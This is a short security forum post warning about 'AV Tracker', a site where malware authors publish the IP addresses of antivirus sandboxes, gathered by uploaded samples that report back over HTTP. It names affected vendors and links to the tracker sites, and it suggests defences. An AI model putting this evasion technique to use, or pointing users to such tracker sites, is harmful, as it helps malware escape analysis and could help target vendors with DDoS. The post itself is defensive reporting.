Hi malware fighters,
Just a couple of days ago a website for malcreants went online to protect their maliicous creations against analysis and research from av-vendors. AV Tracker publishes informationm on automated analysis systems used by av analysts. The malcreant uploads a file to the av coder’s system and waits for execution. This file then “rings home” with additional system information that could be used to blacklist av IP addresses.
The collected information is then published at “AV Tracker”, exposing information about the analysis systems. Besides some well-known AV companies, also CWSandbox and Anubis were affected.
We analyzed the binary and found that it sends a simply HTTP request, in which all extracted information is encoded. An example for an analysis report generated by one of the samples is http://anubis.iseclab.org/?action=result&task_id=361b5a8ee7235954252b02d33b3a7d24. This can be defeated by blocking access to the reporting server or by regularly changing the IP address of the analysis systems, but at the end this will be some kind of arms race again.
At the moment lists were made for Bitdefender, Kaspersky, VirusTotal and ThreatExpert. According to the maker of AV Tracker the IP-lists can also be used for launching an anti-AV DDoS-attack.
A similar malcreant initiative was launched here: http://tra.cker.mobi/
polonus (malware fighter)